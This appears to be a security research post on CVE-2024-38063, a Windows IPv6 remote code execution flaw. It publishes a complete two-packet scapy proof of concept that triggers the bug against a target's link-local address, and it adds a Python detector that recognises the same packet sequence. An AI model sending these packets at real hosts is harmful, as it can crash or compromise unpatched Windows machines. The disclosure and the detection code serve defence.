In August 2024, Microsoft released a patch for a Windows TCP/IP Remote Code Execution (RCE) vulnerability, CVE-2024-38063. Several researchers have since published proofs of concept (PoCs), and around the same time PatchPoint researchers completed their own analysis and reproduction of the issue. Misinformation circulating on various platforms, including Twitter, shows that the conditions actually required to trigger this vulnerability have been widely misunderstood; in particular, a large number of packets is not necessary. To set the record straight, we are releasing a PoC that triggers the vulnerability with the transmission of only two packets.
from scapy.all import *

# Fill in the target's link-local IPv6 address and MAC address before running.
IPAddr = ''  # fe80::XXXX:XXXX:XXXX:XXXX
MACAddr = ''  # XX:XX:XX:XX:XX:XX

# Packet 1: IPv6 (flow label 1) + Destination Options header carrying one option of type 0xC2
# (PadN is used only as a generic TLV container; scapy pads the header to 8 bytes).
ExtHdrDestOpt = Ether(dst=MACAddr) / IPv6(fl=1, dst=IPAddr) / IPv6ExtHdrDestOpt(options=[PadN(otype=0xC2)])
# Packet 2: IPv6 (same flow label) + a bare Fragment header.
ExtHdrFragment = Ether(dst=MACAddr) / IPv6(fl=1, dst=IPAddr) / IPv6ExtHdrFragment()
# Send both frames at layer 2, in this order.
sendp([ExtHdrDestOpt, ExtHdrFragment], verbose=False)
[Demo video: CVE-2024-38063_Demo.mp4]
※ The vulnerability does not trigger the moment the two packets are sent: a waiting time of approximately 60 seconds is required afterwards (the delay matches the IPv6 fragment reassembly timeout), so do not assume the PoC failed if nothing happens immediately.
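For defenders, the useful property of this PoC is how small and distinctive the trigger sequence is. The following is an added example, not part of PatchPoint's release: a dependency-free Python parser that walks an IPv6 extension header chain and a stateful check that alerts when a Destination Options header carrying an option of type 0xC2 is followed, from the same source/destination pair, by a packet carrying a Fragment header. The sample packets are constructed inline to mirror the two scapy frames above (raw IPv6, no Ethernet header; the link-local addresses are placeholders), and the choice to key only on type 0xC2 and on the src/dst pair is an assumption of this example, not a statement about the bug's exact preconditions. Per RFC 8200, an option type whose top two bits are 11 (as 0xC2's are) instructs the receiver to discard the packet and send an ICMPv6 Parameter Problem, which is why this type is so rare in legitimate traffic.

```python
"""Added example (not PatchPoint's code): detect the two-packet sequence
used by the PoC above on raw IPv6 packets. Sample packets are constructed."""
import struct

NH_HOPOPTS = 0
NH_ROUTING = 43
NH_FRAGMENT = 44
NH_NONE = 59
NH_DSTOPTS = 60
EXT_HEADERS = {NH_HOPOPTS, NH_ROUTING, NH_FRAGMENT, NH_DSTOPTS}


def parse_options(blob: bytes) -> list[int]:
    """Walk the TLV option area of a Hop-by-Hop/Destination Options header
    and return the option types it contains (Pad1 is type 0 and has no length)."""
    types, i = [], 0
    while i < len(blob):
        otype = blob[i]
        types.append(otype)
        if otype == 0:              # Pad1: single byte, no length/data
            i += 1
            continue
        if i + 1 >= len(blob):
            raise ValueError("truncated option")
        i += 2 + blob[i + 1]        # type byte, length byte, data
    return types


def parse_ipv6(pkt: bytes) -> dict:
    """Parse the fixed IPv6 header and the chain of extension headers."""
    if len(pkt) < 40 or pkt[0] >> 4 != 6:
        raise ValueError("not an IPv6 packet")
    flow_label = struct.unpack("!I", pkt[:4])[0] & 0xFFFFF
    payload_len, nh = struct.unpack("!HB", pkt[4:7])
    src, dst = pkt[8:24], pkt[24:40]
    end = min(len(pkt), 40 + payload_len)
    headers, off = [], 40
    while nh in EXT_HEADERS and off + 8 <= end:
        if nh == NH_FRAGMENT:
            hdr_len, opts = 8, []           # fixed 8 bytes, no HdrExtLen
        else:
            hdr_len = (pkt[off + 1] + 1) * 8   # HdrExtLen excludes first 8 bytes
            if off + hdr_len > end:
                raise ValueError("truncated extension header")
            opts = (parse_options(pkt[off + 2: off + hdr_len])
                    if nh in (NH_HOPOPTS, NH_DSTOPTS) else [])
        headers.append({"type": nh, "options": opts})
        nh = pkt[off]                       # Next Header of this ext header
        off += hdr_len
    return {"flow_label": flow_label, "src": src, "dst": dst,
            "headers": headers, "upper": nh}


class TwoPacketDetector:
    """Arm on a Destination Options header holding one of `trigger_types`;
    fire on a later Fragment header from the same (src, dst) pair."""

    def __init__(self, trigger_types=(0xC2,)):
        self.trigger_types = set(trigger_types)   # assumption: 0xC2 as in the PoC
        self.armed = set()

    def feed(self, pkt: bytes) -> bool:
        info = parse_ipv6(pkt)
        key = (info["src"], info["dst"])
        for h in info["headers"]:
            if h["type"] == NH_DSTOPTS and self.trigger_types & set(h["options"]):
                self.armed.add(key)
        has_fragment = any(h["type"] == NH_FRAGMENT for h in info["headers"])
        return has_fragment and key in self.armed


def ipv6_header(next_header: int, payload: bytes, flow_label: int = 1) -> bytes:
    """Build a raw IPv6 packet with constructed link-local placeholder addresses."""
    src = bytes.fromhex("fe80000000000000000000000000aaaa")
    dst = bytes.fromhex("fe80000000000000000000000000bbbb")
    first_word = (6 << 28) | (flow_label & 0xFFFFF)
    return struct.pack("!IHBB", first_word, len(payload), next_header, 64) + src + dst + payload


# Constructed samples mirroring the PoC: Destination Options with one 0xC2
# option (zero-length) padded with PadN, then a bare Fragment header.
PKT_DSTOPT = ipv6_header(NH_DSTOPTS, bytes([NH_NONE, 0, 0xC2, 0, 1, 2, 0, 0]))
PKT_FRAG = ipv6_header(NH_FRAGMENT, bytes([NH_NONE, 0, 0, 0, 0, 0, 0, 0]))
# Benign control: Destination Options header containing only PadN padding.
PKT_BENIGN = ipv6_header(NH_DSTOPTS, bytes([NH_NONE, 0, 1, 4, 0, 0, 0, 0]))


def run_demo() -> list[bool]:
    """Feed benign, trigger, fragment; only the last should alert."""
    det = TwoPacketDetector()
    return [det.feed(p) for p in (PKT_BENIGN, PKT_DSTOPT, PKT_FRAG)]


if __name__ == "__main__":
    print(run_demo())
```

In a real sensor the armed state should expire after a window somewhat longer than the ~60 second delay noted above, and the key should include the interface, since the PoC targets link-local addresses that are only unique per link.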